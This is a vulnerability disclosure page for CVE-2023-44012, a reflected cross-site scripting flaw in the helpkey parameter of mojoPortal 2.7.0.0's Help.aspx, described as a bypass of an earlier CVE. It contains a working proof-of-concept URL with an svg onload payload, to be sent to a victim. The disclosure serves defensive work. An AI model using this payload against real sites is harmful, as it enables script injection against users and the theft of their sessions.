Skip to content

Latest commit

 

History

History

CVE-2023-44012

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 

CVE-2023-44012

Basic Information

  • Date: 29/09/2023
  • Affected Version: mojoPortal 2.7.0.0
  • Vendor Homepage: https://www.mojoportal.com/
  • Exploit Author: Trungvm of VietSunshine Cyber Security Services

Description

Cross Site Scripting vulnerability in mojoPortal v.2.7.0.0 allows a remote attacker to execute arbitrary code via the helpkey parameter in the Help.aspx component. This vulnerability is the bypass of CVE-2017-1000457

Attack Vectors

Send the URL http://[site]/Help.aspx?helpkey=xxxxxxx'><svg/onload=alert()+x=' to victim. When victim opens the URL, XSS will be executed

1.png